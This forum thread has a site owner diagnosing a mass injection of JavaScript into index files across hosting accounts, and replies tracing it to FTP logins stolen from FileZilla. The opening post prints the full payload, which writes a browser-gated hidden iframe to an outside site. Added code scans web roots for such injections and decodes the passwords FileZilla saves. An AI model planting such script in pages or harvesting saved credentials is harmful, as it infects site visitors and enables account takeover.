Got hacked... not sure how

penguinbc

New member
Sep 2, 2007
So I have about 20 domains spread across a few host gator accounts and I have my own dedicated server at theplanet that has some websites on it. All have different logins. Every single index.html or index.php had this code added to the bottom of it at around 2am last night and the file permissions changed to 777.

Code:
</html><script>
// Appended after the page's closing </html> tag.
// 1. Identify browser and OS from the user agent.
var BrowserDetect = {
  init: function () {
    this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
    this.version = this.searchVersion(navigator.userAgent)
      || this.searchVersion(navigator.appVersion)
      || "an unknown version";
    this.OS = this.searchString(this.dataOS) || "an unknown OS";
  },
  searchString: function (data) {
    for (var i = 0; i < data.length; i++) {
      var dataString = data[i].string;
      var dataProp = data[i].prop;
      this.versionSearchString = data[i].versionSearch || data[i].identity;
      if (dataString) {
        if (dataString.indexOf(data[i].subString) != -1) return data[i].identity;
      } else if (dataProp) return data[i].identity;
    }
  },
  searchVersion: function (dataString) {
    var index = dataString.indexOf(this.versionSearchString);
    if (index == -1) return;
    return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
  },
  dataBrowser: [
    { string: navigator.userAgent, subString: "Firefox", identity: "Firefox" },
    { string: navigator.userAgent, subString: "MSIE", identity: "Explorer", versionSearch: "MSIE" }
  ],
  dataOS: [
    { string: navigator.platform, subString: "Win", identity: "Windows" }
  ]
};
// 2. Cookie helpers: set a cookie that expires N days out, and read one back.
function addCookie(szName, szValue, dtDaysExpires) {
  var dtExpires = new Date();
  var dtExpiryDate = "";
  dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
  dtExpiryDate = dtExpires.toGMTString();
  document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
function findCookie(szName) {
  var i = 0;
  var nStartPosition = 0;
  var nEndPosition = 0;
  var szCookieString = document.cookie;
  while (i <= szCookieString.length) {
    nStartPosition = i;
    nEndPosition = nStartPosition + szName.length;
    if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
      nStartPosition = nEndPosition + 1;
      nEndPosition = document.cookie.indexOf(";", nStartPosition);
      if (nEndPosition < nStartPosition) nEndPosition = document.cookie.length;
      return document.cookie.substring(nStartPosition, nEndPosition);
      break;
    }
    i++;
  }
  return "";
}
// 3. Only Firefox or IE on Windows, and only once per day per visitor (the
//    "geo_idn" cookie marks visitors already served), gets a hidden 1x1
//    iframe pointing at the attacker's site.
BrowserDetect.init();
var szCookieString = document.cookie;
var boroda = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows"))
    && (findCookie('geo_idn') != 'v48a765e4f75baeb85f0a755fc3ec09c')) {
  addCookie("geo_idn", "v48a765e4f75baeb85f0a755fc3ec09c", 1);
  document.write('<iframe src="http://karenbrowntx.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');
} else {}
</script>
I don't know wtf that is but it caused all my websites to stop responding.

The code was added to a couple dozen html/php files within like a couple of minutes. My first thought, and probably anyone else's, is: well, if it's across multiple accounts, all with different passwords, and on my dedicated as well, then my local machine is compromised. I run the latest Windows updates with McAfee updated and firewalls on; it did not find anything. So I fully uninstalled McAfee, purchased full Avast and ran that, and it did not find anything either. So I purchased Malwarebytes and ran that, and it does not find anything either. I am pretty careful about everything; I am constantly looking at what processes are running in Task Manager, and there is nothing there I don't recognize. I check msconfig to make sure nothing gets added there. I must be doing something wrong (Yeah, you were running McAfee, jackass).

The only thing that all of the accounts have in common is that I have the logins saved in FileZilla, and that is the only way I am thinking it could have happened. Could there be like a Java or web attack that could have executed rogue code on some website and just uploaded my FileZilla logins somewhere?

I checked root on the box; it doesn't seem like anyone else has logged in or run any commands and such. None of my Gmail accounts show any suspicious logins on them. My debit/credit cards that I use daily for online purchases don't show any suspicious charges. Any idea what the hell happened?
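An added example, written for this page and not code from the thread or from any product: a small scan that finds the tampering penguinbc describes, a <script> block appended after </html>, a document.write'd 1x1 iframe, and files left mode 777. The web root it builds is constructed (three files under a temp directory); the payload it plants is a trimmed copy of the posted script with only the iframe call; the pattern list and every function name below are this example's own assumptions.

```python
# Added example for this page; not code from the thread or from any product.
# Scans a web root for the tampering described in the post: a <script>
# block appended after </html> that document.write()s a 1x1 iframe, and
# files left world-writable (the 777 permissions the attacker set).
import os
import re
import stat
import tempfile

# Patterns derived from the posted payload; the function and file names
# below are this example's own.
INJECTION_PATTERNS = [
    re.compile(r"</html>\s*<script", re.I),                    # script after the closing tag
    re.compile(r'document\.write\(\s*["\']<iframe', re.I),      # iframe written from JS
    re.compile(r"<iframe[^>]*height\s*=\s*[\"']?1px", re.I),    # 1-pixel-high iframe
]
WEB_EXTENSIONS = (".html", ".htm", ".php", ".js")


def inspect_file(path):
    """Return a list of findings for one file; empty means nothing suspicious."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o002:  # world-writable, e.g. 0777
        findings.append("world-writable (mode %o)" % mode)
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        content = fh.read()
    for pattern in INJECTION_PATTERNS:
        if pattern.search(content):
            findings.append("matches " + pattern.pattern)
    return findings


def scan_webroot(root):
    """Walk root; return {path relative to root: [findings]} for suspect files."""
    suspects = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            findings = inspect_file(full)
            if findings:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                suspects[rel] = findings
    return suspects


def strip_appended_script(content):
    """Drop a <script> block that follows </html>. Returns (cleaned, changed).
    Restoring from a known-good backup is better; this is for triage."""
    m = re.search(r"(</html>)(\s*<script\b.*)$", content, re.I | re.S)
    if not m:
        return content, False
    return content[: m.end(1)] + "\n", True


# Constructed sample payload: the iframe call from the posted script, with the
# browser/cookie gating removed.
PAYLOAD = ('</html><script>document.write(\'<iframe src="http://karenbrowntx.com" '
           'height = "1px" width = "1px"></iframe>\');</script>')


def build_sample_webroot():
    """Constructed sample tree in a temp dir: a clean page, an injected
    index.html left at 0777, and an injected blog/index.php at normal 0644."""
    root = tempfile.mkdtemp(prefix="webroot_")
    clean = os.path.join(root, "about.html")
    with open(clean, "w") as fh:
        fh.write("<html><body>about</body></html>\n")
    os.chmod(clean, 0o644)
    injected = os.path.join(root, "index.html")
    with open(injected, "w") as fh:
        fh.write("<html><body>home</body>" + PAYLOAD + "\n")
    os.chmod(injected, 0o777)
    os.mkdir(os.path.join(root, "blog"))
    php = os.path.join(root, "blog", "index.php")
    with open(php, "w") as fh:
        fh.write("<?php echo 'blog'; ?>\n<html><body>blog</body>" + PAYLOAD + "\n")
    os.chmod(php, 0o644)
    return root


if __name__ == "__main__":
    webroot = build_sample_webroot()
    for rel_path, findings in sorted(scan_webroot(webroot).items()):
        print(rel_path)
        for finding in findings:
            print("   ", finding)
```

Run it against the real document root (scan_webroot("/var/www/...")) and treat the output as the list of files to restore from a known-good copy, then put the permissions back. The cleaner only handles the appended-script case from this thread; the same code can land inside .js files, which this scan lists but does not rewrite.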
 


I had a similar thing happen to me not too long ago. They injected all my domains and it was a bitch cleaning. I'm pretty sure they got the info through FileZilla. Maybe they're stored as plain text. I just use remote desktop now on my VPS, and if I'm doing anything with FTP I make sure to turn the FTP server off when I'm done.
 
Does your host provider have a good firewall? Maybe that's the weak security.

It was spread across at least 4 separate servers, all with different logins. One of them is my private dedicated server only running a few domains. All index files had code added to the bottom of them within like a minute of each other.
 
> I had a similar thing happen to me not too long ago. They injected all my domains and it was a bitch cleaning. I'm pretty sure they got the info through FileZilla. Maybe they're stored as plain text. I just use remote desktop now on my VPS, and if I'm doing anything with FTP I make sure to turn the FTP server off when I'm done.

The only thing I can think of is that I had all my logins stored in FileZilla on my local machine. This might just be it right here, but I am not entirely sure yet. McAfee, Avast and Malwarebytes all come back negative, and I always have a firewall up, so I don't know how it could have happened.

If that was what happened, well, I guess that is my fault. I have like 20 logins, all different, all secure and hard to remember like D$!u8&uW. Maybe I just need to actually write them all down and not save them on my machine anymore...
 
> The only thing I can think of is that I had all my logins stored in FileZilla on my local machine. This might just be it right here, but I am not entirely sure yet. McAfee, Avast and Malwarebytes all come back negative, and I always have a firewall up, so I don't know how it could have happened.


What sort of software are you running on your server?

Do all the sites have the same sort of setup, as in all WordPress, e-commerce software, etc.?

If so, probably a vulnerability that got discovered and people just exploiting it.

If your sites are on different platforms and don't share any similar aspects, then it's something on your own computer.

I would just back up important shit and reformat. A lot of stuff is FUD, and the only way to really clean is a reformat, IMO.
 
> I had a similar thing happen to me not too long ago. They injected all my domains and it was a bitch cleaning. I'm pretty sure they got the info through FileZilla. Maybe they're stored as plain text. I just use remote desktop now on my VPS, and if I'm doing anything with FTP I make sure to turn the FTP server off when I'm done.

Had the same thing happen to me.

The virus gets the FTP username/password from the FTP clients. It then downloads the index files, adds the code and re-uploads them. The code usually points to the same virus. So anyone accessing the site gets infected with the same virus, and it uses the FTP username/password to spread again.
 
> What sort of software are you running on your server?
>
> Do all the sites have the same sort of setup, as in all WordPress, e-commerce software, etc.?
>
> If so, probably a vulnerability that got discovered and people just exploiting it.
>
> If your sites are on different platforms and don't share any similar aspects, then it's something on your own computer.
>
> I would just back up important shit and reformat. A lot of stuff is FUD, and the only way to really clean is a reformat, IMO.

Nothing that is common across them all... unless you count cPanel...

The fact that all accounts had code added to the bottom of index files within 1 minute of each other makes me think they just grabbed all the logins from FileZilla and ran some script that auto-injects it into all index files once it logs in successfully, but I am not sure.

If I told you what websites were compromised I'd probably get a lot of shit from people, so all I can say is there is a lot of sensitive data going through one of them, and I'm lucky that whoever did this did not realize it... hopefully.

> Had the same thing happen to me.
>
> The virus gets the FTP username/password from the FTP clients. It then downloads the index files, adds the code and re-uploads them. The code usually points to the same virus. So anyone accessing the site gets infected with the same virus, and it uses the FTP username/password to spread again.

Yeah... this is probably what happened then... Explains why only the FileZilla logins were compromised and not anything else, like a trojan or keylogger might have done.

On another note, is there a secure FTP program that I can keep passwords in so that I don't have to worry about this happening again?
 
I have had this happen recently too, and what a bitch it is. You really need to quarantine that machine. Contact your host and see if they will remove the virus and change the PWs for you.

Luckily most of my sites are at certifiedhosting, and they were really good about cleaning up all of my sites and setting me up with new passwords. Do not log back into these sites from this machine until you have reformatted it.

It's fucking scary to wake up and see that your traffic went to shit overnight and you find your sites either blank or all virused the fuck up.


[edit] - P.S. - you might want to try and reinstall WP over all of the files. The virus is most noticeable in the index files but gets injected into the .js files too.
 
Keylogger on the machine, or packet sniffer on your network.

One of the accounts that got hit is on a separate HostGator server that I have not even logged in to or looked at in over a year. Its details were stored in FileZilla though... The machine must have been compromised, or just the FileZilla FTP program was...
 
I had a virus that infected my PC and FTP'd into all my sites and changed them. I know because all the websites that had FTP on my computer were infected; the ones that didn't got away scot-free.
 
My employer got hacked when I was there. After some recon, I found out it was cuz one of the guys got a virus on his home machine, and the virus copied all of his FTP logins from FileZilla. Then they put those logins up for sale, and some dudes from Eastern Europe purchased them and hacked our servers.

Maybe something like this as well?

My hackers left a mark and I ended up tracing it back to them. I just emailed those guys and asked how to make my network more secure. They were nice and just told me what they did.
 
> My employer got hacked when I was there. After some recon, I found out it was cuz one of the guys got a virus on his home machine, and the virus copied all of his FTP logins from FileZilla. Then they put those logins up for sale, and some dudes from Eastern Europe purchased them and hacked our servers.
>
> Maybe something like this as well?
>
> My hackers left a mark and I ended up tracing it back to them. I just emailed those guys and asked how to make my network more secure. They were nice and just told me what they did.

Yeah, it's amazing how insecure FileZilla is with login details. When you export your login details it stores the passwords in plain-text .xml format. Doesn't even give you the choice of encrypting.

I'm gonna take a guess and say that they are stored on your computer in a similarly insecure way too.
 
this thread is terrifying. I hope it never happens to me.

To OP, were you able to get the sites back online quickly after discovering the hack?
 
> The only thing that all of the accounts have in common is that I have the logins saved in FileZilla, and that is the only way I am thinking it could have happened. Could there be like a Java or web attack that could have executed rogue code on some website and just uploaded my FileZilla logins somewhere?

You are likely correct, as FileZilla stores that info in a plaintext XML file, including the password.
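An added example for the point made in the last two replies (and the one about FileZilla's exported XML a few posts up); this is written for this page and is not FileZilla's code or anything a poster supplied. It reads a FileZilla sitemanager.xml and shows what a process with access to the file gets. The XML below is constructed; its hosts, users and passwords are made up; the element names (Server, Host, Port, Protocol, User, Pass with an optional encoding="base64" attribute, Logontype, Name) are FileZilla's own.

```python
# Added example for this page; not FileZilla's code and not from the thread.
# Reads a FileZilla sitemanager.xml and shows what an attacker with file
# access gets: every saved password, whether stored in the clear (older
# releases) or Base64-encoded (later 3.x releases without a master password).
import base64
import xml.etree.ElementTree as ET

# Constructed sample, shaped like FileZilla's sitemanager.xml. Hosts, users
# and passwords are made up; the element names are FileZilla's.
SAMPLE_SITEMANAGER = """<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.com</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>siteowner</User>
      <Pass>D$!u8&amp;uW</Pass>
      <Logontype>1</Logontype>
      <Name>shared hosting</Name>
    </Server>
    <Server>
      <Host>sftp.example.net</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
      <Name>dedicated box</Name>
    </Server>
    <Server>
      <Host>ftp.mirror.example.org</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>anonymous</User>
      <Logontype>0</Logontype>
      <Name>public mirror</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def parse_sitemanager(xml_text):
    """Return one dict per <Server>, with the password recovered if present."""
    root = ET.fromstring(xml_text)
    sites = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        password, stored_as = None, "none"
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                # Base64 is an encoding, not encryption: one call undoes it.
                password = base64.b64decode(pass_el.text).decode("utf-8")
                stored_as = "base64"
            else:
                password = pass_el.text
                stored_as = "plaintext"
        sites.append({
            "name": server.findtext("Name", ""),
            "host": server.findtext("Host", ""),
            "port": int(server.findtext("Port", "0") or 0),
            "protocol": "sftp" if server.findtext("Protocol") == "1" else "ftp",
            "user": server.findtext("User", ""),
            "password": password,
            "stored_as": stored_as,
        })
    return sites


def recoverable_credentials(sites):
    """Entries whose password a process reading the file gets with no key."""
    return [s for s in sites if s["password"] is not None]


if __name__ == "__main__":
    entries = parse_sitemanager(SAMPLE_SITEMANAGER)
    for s in recoverable_credentials(entries):
        print("%s://%s:%s@%s:%d  (%s, stored as %s)" % (
            s["protocol"], s["user"], s["password"], s["host"], s["port"],
            s["name"], s["stored_as"]))
```

Point it at the real file (%APPDATA%\FileZilla\sitemanager.xml on Windows, ~/.config/filezilla/sitemanager.xml on Linux) and you get the same list any malware on the box gets, which is the collection step the thread describes. The only entry it cannot recover is the anonymous one, because there is nothing to recover. Current FileZilla can protect the file with a master password; turn that on, or keep the credentials in a password manager and enter them per session, and prefer SFTP so the password is not also readable on the wire.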
 
> Yeah, it's amazing how insecure FileZilla is with login details. When you export your login details it stores the passwords in plain-text .xml format. Doesn't even give you the choice of encrypting.
>
> I'm gonna take a guess and say that they are stored on your computer in a similarly insecure way too.

Is there a different FTP client I should be using? Does anyone know? I'd gladly throw some money at one that I don't have to worry about this happening with.

> This thread is terrifying. I hope it never happens to me.
>
> To OP, were you able to get the sites back online quickly after discovering the hack?

All they did was add some code to the end of the pages that was giving errors for anyone visiting. If this had happened while I was away for a while I'd be screwed. I was paranoid about checking my stuff every few hours before, but this pretty much makes me want to check it even more often.